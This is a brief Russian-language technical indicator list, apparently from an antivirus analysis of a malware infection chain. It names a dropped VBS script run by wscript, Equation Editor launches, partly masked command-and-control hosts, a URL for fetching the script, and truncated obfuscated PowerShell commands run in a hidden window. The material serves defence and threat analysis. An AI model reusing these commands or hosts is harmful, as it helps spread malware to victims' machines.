Техническая информация
- '%WINDIR%\syswow64\wscript.exe' "%APPDATA%\jsonjava.vbs"
- %APPDATA%\jsonjava.vbs
- '72.##.187.87':80
- 'up#####eimagens.com.br':443
- http://72.##.187.87/win/jsonjava.vbs
- 'up#####eimagens.com.br':443
- DNS ASK up#####eimagens.com.br
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -command "$Codigo = 'LgUDQqhlKOvhHpooUDQqhlKOvhHpoCUDQqhlKOvhHpoUDQqhlKOvhHpoJUDQqhlKOvhHpoBTUDQqhlKOvhHpoGgUDQqhlKOvhHpoRQBMUDQqhlKOvhHpoGwUDQqhlKOvhHpoaQBEUDQqhlKOvhHpoFsUDQqhlKOvhHpoMQBdUDQq...' (со скрытым окном)
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -command "$Codigo = 'LgUDQqhlKOvhHpooUDQqhlKOvhHpoCUDQqhlKOvhHpoUDQqhlKOvhHpoJUDQqhlKOvhHpoBTUDQqhlKOvhHpoGgUDQqhlKOvhHpoRQBMUDQqhlKOvhHpoGwUDQqhlKOvhHpoaQBEUDQqhlKOvhHpoFsUDQqhlKOvhHpoMQBdUDQq...